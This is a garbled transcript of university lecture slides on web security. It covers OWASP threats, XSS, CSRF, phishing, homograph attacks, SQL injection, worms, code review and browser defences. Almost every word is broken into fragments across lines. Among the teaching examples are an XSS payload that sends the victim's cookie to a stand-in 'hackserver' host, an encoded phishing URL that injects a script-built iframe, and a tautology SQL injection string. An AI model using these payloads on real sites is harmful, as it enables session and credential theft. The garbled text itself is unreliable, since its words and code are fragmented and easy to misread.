Web-security Vishal Dwivedi [email protected] Analysis of Software Artifacts Vishal...
53
Transcript of Web-security Vishal Dwivedi [email protected] Analysis of Software Artifacts Vishal...
We
b-s
ecu
rity
An
aly
sis
of
So
ftw
are
Art
ifa
cts
Vis
ha
l D
wiv
ed
i
vd
wiv
ed
i@cs
.cm
u.e
du
Ag
en
da
: W
eb
Se
curi
ty
•M
oti
va
tio
n
•B
asi
cs
•K
ey w
eb
se
curi
ty t
hre
ats
•D
esi
gn
ing
fo
r se
curi
ty
•B
row
ser
ba
sed
de
fen
se m
ech
an
ism
s
•A
dis
cuss
ion
on
so
me
ava
ila
ble
to
ols
an
d t
he
ir c
ap
ab
ilit
ies
2
Vu
lne
rab
ilit
ies
tre
nd
(
mid
-20
08
)
htt
p:/
/ww
w-9
35
.ib
m.c
om
/se
rvic
es/
us/
iss/
xfo
rce
/mid
ye
arr
ep
ort
/xfo
rce
-mid
ye
ar-
rep
ort
-20
08
.pd
f3
We
b a
s a
sp
rea
din
g p
oin
t fo
r m
alw
are
…
mca
Fe
e,
Th
rea
t P
red
icti
on
s re
po
rt 2
00
9
htt
p:/
/ww
w.m
cafe
e.c
om
/us/
loca
l_co
nte
nt/
rep
ort
s/2
00
9_
thre
at_
pre
dic
tio
ns_
rep
ort
.pd
f4
Th
e t
op
10
vu
lne
rab
ilit
y l
ist
-2
00
7
1.
Cro
ss S
ite
Scr
ipti
ng
(X
SS
)
2.
Inje
ctio
n F
law
s
3.
Ma
lici
ou
s F
ile
Exe
cuti
on
4.
Inse
cure
Dir
ect
Ob
ject
Re
fere
nce
5.
Cro
ss S
ite
Re
qu
est
Fo
rge
ry (
CS
RF
)
6.
Info
rma
tio
n L
ea
ka
ge
an
d I
mp
rop
er
Err
or
Ha
nd
lin
g
7.
Bro
ke
n A
uth
en
tica
tio
n a
nd
Se
ssio
n M
an
ag
em
en
t
8.
Inse
cure
Cry
pto
gra
ph
ic S
tora
ge
9.
Inse
cure
Co
mm
un
ica
tio
ns
10
.F
ail
ure
to
Re
stri
ct U
RL
Acc
ess
So
urc
e:
OW
AS
P (
Op
en
We
b A
pp
lica
tio
n S
ecu
rity
Pro
ject
) R
ep
ort
5
Fro
m t
he
la
st s
oft
wa
re a
rch
ite
ctu
re le
ctu
re… @
sou
rce
:
Dr
Da
vid
Ga
rla
n
To
wh
ich
mo
de
l d
o t
he
cu
rre
nt
we
b-a
pp
lica
tio
ns
fall
in
?
6
We
b s
ecu
rity
: t
wo
sid
es
•W
eb
bro
wse
r: (c
lie
nt
sid
e)
–A
tta
cks
targ
et
we
akn
ess
es
of
bro
wse
r se
curi
ty–
Re
sult
in
:•
Ma
lwa
re i
nst
alla
tio
n
•D
ocu
me
nt
the
ft
•W
eb
ap
pli
cati
on
co
de
: (s
erv
er
sid
e)
–R
un
s a
t w
eb
sit
e:
b
an
ks,
e-m
erc
ha
nts
, b
log
s–
Ma
ny p
ote
nti
al
bu
gs:
XS
S,
XS
RF
, S
QL
inje
ctio
n–
Att
ack
s le
ad
to
sto
len
pe
rso
na
l in
form
ati
on
, d
efa
ced
si
tes.
7
Dis
cuss
ing
th
e b
asi
c e
lem
en
ts o
f w
eb
•U
RLs
•Ja
va
Scr
ipts
•C
oo
kie
s
•S
ess
ion
Id
s
8
UR
L
htt
p:/
/ww
w.s
om
e-w
eb
site
.co
m:8
0/x
/y/z
.htm
l?u
ser=
Vis
ha
l&y
ea
r=2
00
8#
p
UR
I S
che
me
Ho
st N
am
e
Po
rt N
um
be
r
Hie
rarc
hic
al
po
rtio
n
Qu
ery
Fra
gm
en
t
<sch
eme
nam
e> :
<hie
rarc
hica
l par
t> [
? <q
uery
> ] [
# <
fragm
ent>
]
So
urc
e:
h
ttp
://e
n.w
ikip
ed
ia.o
rg/w
iki/
UR
I_sc
he
me
9
Java
Scr
ipt
in H
TM
L
<body>
...
<script type="text/javascript" src=“myCode.js" />
<script type="text/javascript">
//<![CDATA[
alert ("Cookie:"+document.cookie);
//]]>
</script>
<p onclick="alert('I told you not to click on me!');">
Please do not click on this text.</p>
...
</body>
Ext
ern
al Ja
vasc
rip
t F
ile In
lin
e C
od
e
Eve
nt
Ha
nd
ler
10
Co
ok
ies
Co
nsi
st o
f a
ttri
bu
te v
alu
e p
air
s:
av-pairs = av-pair *(";" av-pair)
av-pair = attr ["=" value] ; optional value
attr
= token value = token | quoted-string
RF
C 2
96
5 h
ttp
://t
oo
ls.i
etf
.org
/htm
l/rf
c29
65
11
Se
ssio
n I
ds
Se
ssio
n I
Ds
ha
ve
th
e f
orm
:
SID
:typ
e:r
ea
lm:i
de
nti
fie
r[-t
hre
ad
][:c
ou
nt]
Example:
SID
:AN
ON
:ww
w.w
3.o
rg:j
6o
AO
xCW
Zh
/CD
72
3LG
eX
lf-0
1:3
4
SID
:AN
ON
:mc.
ai.
mit
.ed
u:N
Rvi
Sp
oY
m7
md
kY
B4
W2
47
1l-
01
:35
Mo
st o
f th
e t
ime
s:
ide
nti
fie
r =
MD
5 (
rea
lm +
ke
y),
wh
ere
cli
en
t st
ore
s th
e k
ey
, o
r b
ase
s th
at
on
sy
ste
m t
ime
.
A g
oo
d s
ess
ion
id
sh
ou
ld h
ave
“H
IGH
EN
TR
OP
Y”
an
d “
LAR
GE
AD
DR
ES
S S
PA
CE
” 12
Dis
cuss
ion
on
so
me
we
b-s
ecu
rity
th
rea
ts
XS
S –
Cro
ss s
ite
scr
ipti
ng
CS
RF
–cr
oss
sit
e r
eq
ue
st f
org
ery
Se
ssio
n H
ija
ckin
gH
om
og
rap
hic
att
ack
sD
efa
cem
en
tIn
filt
rati
on
Ph
ish
ing
Ph
arm
ing
Click
Fra
ud
De
nia
l o
f S
erv
ice
Da
ta T
he
ft/L
oss
13
Cro
ss s
ite
scr
ipti
ng
(X
SS
) a
tta
cks
14
htt
p:/
/ww
w.v
irtu
alf
org
e.d
e/v
mo
vie
/xss
_le
sso
n_
1/x
ss_
sell
ing
_p
latf
orm
_v
1.0
.htm
l
<sc
rip
t> d
ocu
me
nt.
wri
te (
‘<im
g s
rc=
“htt
p:/
/ha
ckse
rve
r.e
xam
ple
.co
m/g
rab
.js
p?
coo
kie
=‘
+d
ocu
me
nt.
coo
kie
+
“‘>
’);<
/scr
ipt>
Cro
ss-s
ite
re
qu
est
fo
rge
ry (
CS
RF
/XS
RF
) a
tta
ck
Exp
loit
th
e
tru
st
of
the
w
eb
site
o
n
a
use
r’s
bro
wse
r to
pe
rfo
rm o
ne
cli
ck o
pe
rati
on
s.
Ma
ny
we
bsi
tes
(fo
r e
xam
ple
Go
og
le)
use
th
e s
am
e c
oo
kie
for
au
the
nti
cati
on
to
it’
s m
ult
iple
se
rvic
es.
15
Ph
ish
ing
•A
tta
cke
r se
ts u
p s
po
ofe
d s
ite
th
at
loo
ks
rea
l
–Lu
res
use
rs t
o e
nte
r lo
gin
cre
de
nti
als
an
d s
tore
s th
em
–U
sua
lly
se
nt
thro
ug
h a
n e
-ma
il w
ith
lin
k t
o s
po
ofe
d s
ite
ask
ing
use
rs t
o “
ve
rify
”th
eir
acc
ou
nt
info
–T
he
lin
ks
mig
ht
be
dis
gu
ise
d t
hro
ug
h t
he
cli
ck t
ext
s
–W
ary
use
rs c
an
se
e a
ctu
al
UR
L if
th
ey
ho
ve
r o
ve
r li
nk
16
Exa
mp
le:
htt
ps:
//w
ww
.un
ion
sta
nd
ard
sb.c
om
/scr
ipt/
Log
inS
erv
let?
fun
ctio
n=
%2
2%
3E
%
3C
scri
pt%
3E
do
cum
en
t.
wri
te%
28
Str
ing
.fro
mC
ha
rCo
de
%2
86
0%
2C
11
5
%2
C9
9%
2C
11
4%
2C
10
5%
2C
11
2%
2C
11
6
%2
C6
2%
2C
60
%2
C1
05
%2
C1
02
%2
C1
1 4
%2
C9
7%
2C
10
9%
2C
10
1%
2C
32
%2
C1
1
5%
2C
11
4%
2
C9
9%
2C
61
%2
C1
04
%2
C1
1 6
%2
C1
1 6
%2
C1
1
2%
2C
58
%2
C4
7
%2
C4
7%
2C
11
9%
2C
11
9%
2C
11
9
%2
C4
6%
2C
99
%2
C1
21
%2
C
98
%2
C1
01
%2
C1
1 4
%2
C9
9%
2C
11
4
%2
C1
05
%2
C1
09
%2
C1
05
%2
C1
1 0
%2
C9
7%
2C
10
8%
2C
98
%2
C9
7%
2C
11
0
%2
C1
07
%2
C
46
%2
C9
9%
2C
11
1 %
2C
10
9%
2C
47
%2
C1
08
%2
C1
11
%
2C
10
3
%2
C1
05
%2
C1
1 0
%2
C4
6%
2C
11
2%
2C
10
4%
2C
11
2
%2
C6
2%
2
C6
0%
2C
47
%2
C1
1 5
%2
C9
9%
2C
11
4%
2C
10
5%
2C
11
2
%2
C1
1 6
%2
C6
2%
29
%2
9%
3C
/scr
ipt%
3E
17
Wh
ich
is
eq
uiv
ale
nt
to:
htt
ps:
//w
ww
.un
ion
sta
nd
ard
sb.c
om
/scr
ipt/
Log
inS
erv
let
?fu
nct
ion
=”>
<sc
rip
t>d
ocu
me
nt.
wri
te (
Str
ing
.fro
mC
ha
r
Co
de
(60
,10
5,1
02
,11
4,9
7,1
09
,10
1,3
2,1
1 5
,11
4,9
9,6
1,1
04
,11
6,1
1 6
,
11
2,5
8,4
7,4
7,1
1 9
,11
9,1
1 9
,46
,99
,12
1,9
8,1
01
,11
4,9
9,1
1 4
,10
5,1
09
,1
05
,11
0,9
7,1
08
,98
,97
,11
0,1
07
,46
,99
,11
1 ,
10
9,4
7,1
08
,11
1 ,
10
3,1
05
,1
10
,46
,11
2,1
04
,11
2,6
2))
</s
crip
t>
<if
ram
e s
rc=
htt
p:/
/ww
w.c
yb
erc
rim
ina
lba
nk
.co
m/l
og
in.p
hp
>
OR
18
Wh
at’
s th
e d
iffe
ren
ce b
etw
ee
n t
he
two
UR
L’s?
ww
w.p
ay
pa
l.co
m
an
d
ww
w.p
аy
pa
l.co
m
Let’
s co
py
bo
th t
o o
ur
bro
wse
r a
nd
ch
eck
ou
t.
19
Ho
mo
gra
ph
ic a
tta
ck
Sim
ila
r lo
ok
ing
ch
ara
cte
rs w
ere
use
d t
o r
eg
iste
r
a w
eb
site
ha
vin
g a
dif
fere
nt
DN
S a
dd
ress
.
P`a
’yp
al
а:
C
ryll
ic c
ha
ract
er
[p&
#1
07
2;y
pa
l.co
m]
Wh
ich
po
ints
to
htt
p:/
/ww
w.x
n--
py
pa
l-4
ve
.co
m/ 2
0
Ph
arm
ing
•Li
ke
ph
ish
ing
, a
tta
cke
r’s
go
al
is t
o g
et
use
r to
en
ter
sen
siti
ve
da
ta i
nto
sp
oo
fed
we
bsi
te
•D
NS C
ach
e P
ois
on
ing
–a
tta
cke
r is
ab
le t
o r
ed
ire
ct
leg
itim
ate
UR
L to
th
eir
sp
oo
fed
sit
e
•D
NS
tra
nsl
ate
s U
RL
to a
pp
rop
ria
te I
P a
dd
ress
•A
tta
cke
r m
ak
es
DN
S t
ran
sla
te l
eg
itim
ate
UR
L to
th
eir
IP
ad
dre
ss i
nst
ea
d a
nd
th
e r
esu
lt g
ets
ca
che
d,
po
iso
nin
g f
utu
re r
ep
lie
s a
s w
ell
21
Inje
ctio
n F
law
s
•In
ject
ion
fla
ws
occ
ur
wh
en
use
r-su
pp
lie
d d
ata
is
pa
sse
d t
o a
n i
nte
rpre
ter
as
pa
rt o
f a
co
mm
an
d o
r q
ue
ry.
•T
he
se m
ay b
e u
sed
to
in
vo
ke
ext
ern
al co
mm
an
ds
lik
e
she
ll c
om
ma
nd
s, s
crip
ts e
tc t
o a
cce
ss l
oca
l fi
les,
SQ
L d
ata
, LD
AP
da
ta o
r X
pa
th/X
SLT
/XM
L co
nte
nt.
Exa
mp
le:
SQ
L in
ject
ion
No
rma
l:S
ELE
CT
* F
RO
M c
ust
om
ers
WH
ER
E u
sern
am
e =
‘vis
ha
l‘
Inje
ctio
n:
SE
LEC
T *
FR
OM
cu
sto
me
rs W
HE
RE
use
rna
me
= ''
OR
1''
22
Se
ssio
n H
ija
ckin
g
Gu
ess
ing
/Ha
ckin
g t
he
se
ssio
n-i
d s
tore
d in
th
e
coo
kie
s
Mo
stly
use
d w
ith
a c
om
bin
ati
on
of
foll
ow
ing
att
ack
s:
-C
ross
sit
e s
crip
tin
g
-S
ess
ion
sid
eja
ckin
g
23
De
face
me
nt
24
De
nia
l o
f S
erv
ice
att
ack
Ima
ge
co
py
rig
ht
@A
CM
(h
ttp
://w
ww
.acm
.org
/cro
ssro
ad
s/xr
ds1
0-1
/tra
cin
gD
OS
.htm
l)
•A
tte
mp
t to
ma
ke
a c
om
pu
ter
reso
urc
e
un
av
aila
ble
to
its
in
ten
de
d u
sers
Ex
am
ple
:
•S
atu
rati
ng
th
e t
arg
et
(vic
tim
) m
ach
ine
wit
h
ext
ern
al co
mm
un
ica
tio
ns
req
ue
sts
25
Wo
rms
–e
xam
ple
Co
nfi
cke
r
Is d
ow
nlo
ad
ed
as
a
ma
lwa
re
It r
un
s in
to a
n i
nfi
nit
e
loo
p w
he
re i
t g
en
era
tes
15
0 d
om
ain
na
me
s a
nd
pro
pa
ga
tes
by
co
nn
ect
ing
to t
he
ext
ern
al
da
tab
ase
s
an
d r
ep
lica
tin
g i
tse
lf o
n
the
ho
st s
ite
s
So
urc
e:
SR
I T
ech
nic
al
rep
ort
htt
p:/
/mtc
.sri
.co
m/C
on
fick
er/
26
27
So
urc
e:
SR
I T
ech
nic
al
rep
ort
htt
p:/
/mtc
.sri
.co
m/C
on
fick
er/
Uti
lizi
ng
RP
C b
uff
er
ove
rflo
w t
o
up
da
te
So
urc
e:
SR
I T
ech
nic
al
rep
ort
htt
p:/
/mtc
.sri
.co
m/C
on
fick
er/
28
Let’
s a
na
lyze
th
e c
od
e o
f a
sim
ple
vir
us
imp
lem
en
ted
in
C
29
Ho
w V
iru
ses/
Wo
rms
wo
rk:
a b
rie
f d
iscu
ssio
n
Oth
er
vu
lne
rab
ilit
ies
•A
PI
Ab
use
•A
uth
en
tica
tio
n V
uln
era
bilit
y
•A
uth
ori
zati
on
Vu
lne
rab
ilit
y
•A
va
ila
bilit
y V
uln
era
bilit
y
•C
od
e P
erm
issi
on
Vu
lne
rab
ilit
y
•C
od
e Q
ua
lity
Vu
lne
rab
ilit
y
•C
on
curr
en
cy V
uln
era
bilit
y
•C
on
fig
ura
tio
n V
uln
era
bil
ity
•C
ryp
tog
rap
hic
Vu
lne
rab
ilit
y
•E
nco
din
g V
uln
era
bilit
y
•E
nv
iro
nm
en
tal
Vu
lne
rab
ilit
y
•In
pu
t V
ali
da
tio
n V
uln
era
bilit
y
•Lo
gg
ing
an
d A
ud
itin
g V
uln
era
bilit
y
•P
ass
wo
rd M
an
ag
em
en
t V
uln
era
bilit
y
•P
ath
Vu
lne
rab
ilit
y
•P
roto
col E
rro
rs
•R
an
ge
an
d T
yp
e E
rro
r V
uln
era
bil
ity
•S
en
siti
ve
Da
ta P
rote
ctio
n V
uln
era
bilit
y
•S
ess
ion
Ma
na
ge
me
nt
Vu
lne
rab
ilit
y
•S
yn
chro
niz
ati
on
an
d T
imin
g V
uln
era
bilit
y
•U
nsa
fe M
ob
ile
Co
de
•U
se o
f D
an
ge
rou
s A
PI
•G
en
era
l Lo
gic
Err
or
Vu
lne
rab
ilit
y
•E
rro
r H
an
dli
ng
Vu
lne
rab
ilit
y
An
d m
an
y m
ore
…
So
urc
e:
OW
AS
P (
htt
p:/
/ww
w.o
wa
sp.o
rg)
30
De
sig
nin
g f
or
secu
rity
Th
e s
tan
da
rd d
efe
nse
me
cha
nis
ms
Ad
he
rin
g t
o b
asi
c p
rin
cip
les
Th
rea
t m
od
elin
g
31
Th
e s
tan
da
rd s
ecu
rity
me
cha
nis
ms
1.
Au
the
nti
cati
on
2.
Au
tho
riza
tio
n
3.
Co
nfi
de
nti
ali
ty
4.
Da
ta /
Me
ssa
ge
In
teg
rity
5.
Acc
ou
nta
bil
ity
6.
Ava
ila
bil
ity
7.
No
n-R
ep
ud
iati
on
32
Sta
nd
ard
Se
curi
ty P
rin
cip
les
Co
mp
art
me
nta
lize
Use
le
ast
pri
vil
eg
e
Ap
ply
de
fen
se i
n d
ep
th
Do
no
t tr
ust
use
r in
pu
t
Ch
eck
at
the
ga
te
Fa
il s
ecu
rely
Se
cure
th
e w
ea
ke
st l
ink
Cre
ate
se
cure
de
fau
lts
Re
du
ce y
ou
r a
tta
ck s
urf
ace
33
Th
rea
t M
od
eli
ng
Application Type
Most Significant Threat
Civil Liberties web site
White House web site
Defacement
Financial Institution
Electronic Commerce
Compromise one or more
accounts;
Denial-of-Service
Military Institution
Electronic Commerce
Infiltration; access to
classified data
34
Te
stin
g f
or
we
b-s
ecu
rity
bu
gs:
Co
de
Re
vie
w
35
Ma
in t
ask
: I
de
nti
fy a
nd
min
imiz
e t
he
Att
ack
su
rfa
ce
Pro
ba
ble
In
pu
ts:
Bro
wse
r in
pu
t
Co
ok
ies
Pro
pe
rty
file
s
Ext
ern
al p
roce
sse
s
Da
ta f
ee
ds
Se
rvic
e r
esp
on
ses
Fla
t fi
les
Co
mm
an
d lin
e p
ara
me
ters
En
vir
on
me
nt
va
ria
ble
s
Pe
rfo
rm a
da
ta f
low
an
aly
sis
con
sid
eri
ng
th
e m
ajo
r
tra
nsa
ctio
ns
wh
ich
occ
ur
in t
he
ap
pli
cati
on
, fo
r
exa
mp
le:
•D
ata
/In
pu
t V
alid
ati
on
of
da
ta f
rom
all u
ntr
ust
ed
sou
rce
s
•A
uth
en
tica
tio
n
•S
ess
ion
Ma
na
ge
me
nt
•A
uth
ori
zati
on
•C
ryp
tog
rap
hy
(D
ata
at
rest
an
d i
n t
ran
sit)
•E
rro
r H
an
dli
ng
/In
form
ati
on
Le
ak
ag
e
•Lo
gg
ing
/A
ud
itin
g
•S
ecu
re C
od
e E
nv
iro
nm
en
t
OW
AS
P C
od
e r
evie
w s
tep
s
36
•S
ea
rch
fo
r k
ey
in
dic
ato
rs
•Id
en
tify
HT
TP
re
qu
est
Str
ing
s
•Id
en
tify
th
e r
esp
on
ses
to t
he
cli
en
t
•Id
en
tify
all d
ata
acc
ess
es
•C
he
ck o
ut
coo
kie
ma
nip
ula
tio
n
•S
ea
rch
fo
r v
uln
era
ble
HT
ML
tag
s
•A
na
lyze
in
pu
t co
ntr
ols
•A
na
lyze
co
nfi
gu
rati
on
fil
es
an
d
pa
ssw
ord
s
•A
na
lyze
sy
ste
m e
rro
rs
•A
na
lyze
pe
rmis
sio
ns
Ide
nti
fy a
rea
of
cod
e w
ith
se
curi
ty
imp
lica
tio
ns,
su
ch a
s sa
y a
de
fau
lt J
SP
pa
ge
be
ing
acc
ess
ed
by
clie
nts
.
OW
AS
P C
od
e r
evie
w s
tep
s
37
•S
ea
rch
fo
r k
ey
in
dic
ato
rs
•Id
en
tify
HT
TP
re
qu
est
Str
ing
s
•Id
en
tify
th
e r
esp
on
ses
to t
he
cli
en
t
•Id
en
tify
all d
ata
acc
ess
es
•C
he
ck o
ut
coo
kie
ma
nip
ula
tio
n
•S
ea
rch
fo
r v
uln
era
ble
HT
ML
tag
s
•A
na
lyze
in
pu
t co
ntr
ols
•A
na
lyze
co
nfi
gu
rati
on
fil
es
an
d
pa
ssw
ord
s
•A
na
lyze
sy
ste
m e
rro
rs
•A
na
lyze
pe
rmis
sio
ns
req
ue
st.a
cce
ptt
yp
es
req
ue
st.b
row
ser
req
ue
st.f
ile
s
req
ue
st.h
ea
de
rs
req
ue
st.h
ttp
me
tho
d
req
ue
st.i
tem
req
ue
st.q
ue
ryst
rin
g
req
ue
st.f
orm
req
ue
st.c
oo
kie
s
req
ue
st.c
ert
ific
ate
req
ue
st.r
aw
url
req
ue
st.s
erv
erv
ari
ab
les
req
ue
st.u
rl
req
ue
st.u
rlre
ferr
er
req
ue
st.u
sera
ge
nt
req
ue
st.u
serl
an
gu
ag
es
req
ue
st.I
sSe
cure
Co
nn
ect
ion
req
ue
st.T
ota
lBy
tes
req
ue
st.B
ina
ryR
ea
d
Inp
utS
tre
am
Hid
de
nF
ield
.Va
lue
Te
xtB
ox.
Te
xt
reco
rdS
et
OW
AS
P C
od
e r
evie
w s
tep
s
38
•S
ea
rch
fo
r k
ey
in
dic
ato
rs
•Id
en
tify
HT
TP
re
qu
est
Str
ing
s
•Id
en
tify
th
e r
esp
on
ses
to t
he
cli
en
t
•Id
en
tify
all d
ata
acc
ess
es
•C
he
ck o
ut
coo
kie
ma
nip
ula
tio
n
•S
ea
rch
fo
r v
uln
era
ble
HT
ML
tag
s
•A
na
lyze
in
pu
t co
ntr
ols
•A
na
lyze
co
nfi
gu
rati
on
fil
es
an
d
pa
ssw
ord
s
•A
na
lyze
sy
ste
m e
rro
rs
•A
na
lyze
pe
rmis
sio
ns
Exa
mp
le:
resp
on
se.w
rite
<%
=
Htt
pU
tili
ty
Htm
lEn
cod
e
Url
En
cod
e
inn
erT
ext
inn
erH
TM
L
OW
AS
P C
od
e r
evie
w s
tep
s
39
•S
ea
rch
fo
r k
ey
in
dic
ato
rs
•Id
en
tify
HT
TP
re
qu
est
Str
ing
s
•Id
en
tify
th
e r
esp
on
ses
to t
he
cli
en
t
•Id
en
tify
all d
ata
acc
ess
es
•C
he
ck o
ut
coo
kie
ma
nip
ula
tio
n
•S
ea
rch
fo
r v
uln
era
ble
HT
ML
tag
s
•A
na
lyze
in
pu
t co
ntr
ols
•A
na
lyze
co
nfi
gu
rati
on
fil
es
an
d
pa
ssw
ord
s
•A
na
lyze
sy
ste
m e
rro
rs
•A
na
lyze
pe
rmis
sio
ns
Exa
mp
le:
exe
c sp
_e
xecu
tesq
l
exe
cute
sp
_e
xecu
tesq
l
sele
ct f
rom
Inse
rt
up
da
te
de
lete
fro
m w
he
re
OW
AS
P C
od
e r
evie
w s
tep
s
40
•S
ea
rch
fo
r k
ey
in
dic
ato
rs
•Id
en
tify
HT
TP
re
qu
est
Str
ing
s
•Id
en
tify
th
e r
esp
on
ses
to t
he
cli
en
t
•Id
en
tify
all d
ata
acc
ess
es
•C
he
ck o
ut
coo
kie
ma
nip
ula
tio
n
•S
ea
rch
fo
r v
uln
era
ble
HT
ML
tag
s
•A
na
lyze
in
pu
t co
ntr
ols
•A
na
lyze
co
nfi
gu
rati
on
fil
es
an
d
pa
ssw
ord
s
•A
na
lyze
sy
ste
m e
rro
rs
•A
na
lyze
pe
rmis
sio
ns
Htm
lEn
cod
e
UR
LEn
cod
e
<a
pp
let>
<fr
am
ese
t>
<e
mb
ed
>
<fr
am
e>
<h
tml>
<if
ram
e>
<im
g>
<st
yle
>
<la
ye
r>
<il
ay
er>
<m
eta
>
<o
bje
ct>
<b
od
y>
<fr
am
e s
ecu
rity
<if
ram
e s
ecu
rity
OW
AS
P C
od
e r
evie
w s
tep
s
41
•S
ea
rch
fo
r k
ey
in
dic
ato
rs
•Id
en
tify
HT
TP
re
qu
est
Str
ing
s
•Id
en
tify
th
e r
esp
on
ses
to t
he
cli
en
t
•Id
en
tify
all d
ata
acc
ess
es
•C
he
ck o
ut
coo
kie
ma
nip
ula
tio
n
•S
ea
rch
fo
r v
uln
era
ble
HT
ML
tag
s
•A
na
lyze
in
pu
t co
ntr
ols
•A
na
lyze
co
nfi
gu
rati
on
an
d p
ass
wo
rds
•A
na
lyze
sy
ste
m e
rro
rs
•A
na
lyze
pe
rmis
sio
ns
req
ue
stE
nco
din
g
resp
on
seE
nco
din
g
tra
ce
au
tho
riza
tio
n
com
pil
ati
on
Cu
sto
mE
rro
rs
htt
pC
oo
kie
s
htt
pH
an
dle
rs
htt
pR
un
tim
e
sess
ion
Sta
te
ma
xRe
qu
est
Len
gth
de
bu
g
form
s p
rote
ctio
n
ap
pS
ett
ing
s
Co
nfi
gu
rati
on
Se
ttin
gs
ap
pS
ett
ing
s
con
ne
ctio
nS
trin
gs
au
the
nti
cati
on
mo
de
all
ow
de
ny
cre
de
nti
als
ide
nti
ty im
pe
rso
na
te
tim
eo
ut
rem
ote
Bro
wse
r b
ase
d d
efe
nse
me
cha
nis
ms
Sa
nd
bo
xin
gM
inim
al
Pri
vile
ge
sS
ep
ara
tio
n o
f co
nce
rns
Co
ok
ie b
lock
ing
Bo
wse
r w
arn
ing
s
42
Sa
nd
bo
xin
g
•B
row
ser
("k
ern
el"
)
–F
ull
pri
vil
eg
es
(fil
e s
yst
em
, n
etw
ork
ing
)
–C
oa
rse
-gra
ine
d s
ecu
rity
p
oli
cie
s p
rote
ct l
oca
l sy
ste
m
•R
en
de
rin
g e
ng
ine
–S
an
db
oxe
d
–F
ine
-gra
ine
d s
am
e o
rig
in
po
licy
en
forc
em
en
t
So
urc
e:
Ba
rth
et
al.
"T
he
Se
curi
ty A
rch
ite
ctu
re o
f th
e C
hro
miu
m B
row
ser"
43
Min
ima
l P
rivil
eg
es
Pro
tect
ed
Mo
de
in
IE
•IE
7 i
n V
ista
is
a "
low
rig
hts
" p
roce
ss
•C
an
pro
mp
t u
ser
to g
et
mo
re p
riv
ile
ge
s
44
Pre
ve
nti
ng
fil
e t
he
ft
Th
rou
gh
bro
wse
r re
stri
ctio
ns
wh
ich
im
po
se
rest
rict
ion
s o
n w
he
re t
he
re
nd
ere
r:
-ca
n w
rite
fil
es
to f
ixe
d lo
cati
on
s
-ca
n o
nly
up
loa
d f
ile
usi
ng
ke
rne
l’s
file
pic
ke
r
-ca
n m
ak
e o
nly
use
se
lect
ed
we
b s
che
me
s
wh
ich
are
sa
fe (
htt
p,
htt
ps,
ftp
)
45
Se
pa
rati
on
of
con
cern
s b
etw
ee
n
bro
wse
r k
ern
el
an
d r
en
de
rer
So
urc
e:
Ba
rth
et
al.
"T
he
Se
curi
ty A
rch
ite
ctu
re o
f th
e C
hro
miu
m B
row
ser"
46
Co
ok
ie b
lock
ing
•B
lock
th
e "
Co
ok
ie"
he
ad
er
for
cro
ss-d
om
ain
reso
urc
e l
oa
ds
•T
hir
d-p
art
y c
oo
kie
blo
ckin
g a
lre
ad
y d
oe
s
this
fo
r p
riva
cy
•T
hir
d-p
art
y f
ram
es
are
ok
47
Bro
wse
r W
arn
ing
s
48
Te
stin
g f
or
we
b-s
ecu
rity
bu
gs
Mu
ltip
le c
om
me
rcia
l a
nd
op
en
so
urc
e t
oo
ls e
xist
s to
da
y w
hic
h a
uto
ma
te t
he
te
stin
g o
f w
eb
-a
pp
lica
tio
n v
uln
era
bil
itie
s (a
cro
ss t
he
co
mp
lete
li
fe c
ycl
e o
f w
eb
ap
pli
cati
on
s)
On
e s
uch
to
ol:
HP
We
b-I
nsp
ect
OW
AS
P p
rovid
es
a c
oll
ect
ion
of
op
en
-so
urc
e t
oo
ls
Oth
er
too
ls i
ncl
ud
e d
ata
flo
w a
na
lysi
s fo
r e
xecu
tab
les
(lik
e I
DA
Pro
)
49
We
b-S
cara
b t
oo
l: a
na
lysi
s o
f H
TT
P a
nd
HT
TP
S s
ess
ion
50
Act
s a
s a
n in
terc
ep
tor
pro
xy a
nd
an
aly
zes
all
req
ue
sts
wh
ich
ori
gin
ate
fro
m a
n
ap
plica
tio
n
Co
uld
be
use
d f
or
an
aly
zin
g s
ess
ion
s,
coo
kie
s
51
Use
r ca
n g
en
era
te in
pu
ts a
nd
th
e t
oo
l ca
n a
na
lyze
if
the
y a
re v
ali
d.
Alt
ho
ug
h i
t is
dif
ficu
lt t
o s
ecu
re e
ve
ryth
ing
all
th
e t
ime
!!
Bu
t th
e f
oll
ow
ing
de
fin
ite
ly h
elp
s:
•G
oo
d c
od
ing
pra
ctic
es
•Le
arn
ing
fro
m m
ista
ke
s
•B
ein
g s
ecu
rity
co
nsc
iou
s
•C
on
sid
eri
ng
ho
w a
n a
tta
cke
r ca
n h
arm
…
At
an
y t
ime
, yo
u c
an
fin
d N
nu
mb
er
of
PC
s a
t C
MU
wit
h d
efa
ult
lo
gin
p
ass
wo
rds
(ad
min
/ad
min
) fo
r th
eir
to
mca
t se
rve
rs.
We
ll w
e a
re n
ot
alo
ne
:
Un
til
rece
ntl
y t
he
lo
gin
/pa
ssw
ord
fo
r In
dia
n t
ax
po
rta
l (h
ttp
://i
nco
me
taxi
nd
ia.g
ov.i
n)
wa
s a
dm
in/a
dm
in
52
Th
an
ks
!!
Vis
ha
l D
wiv
ed
i
vd
wiv
ed
i@cs
.cm
u.e
du
53
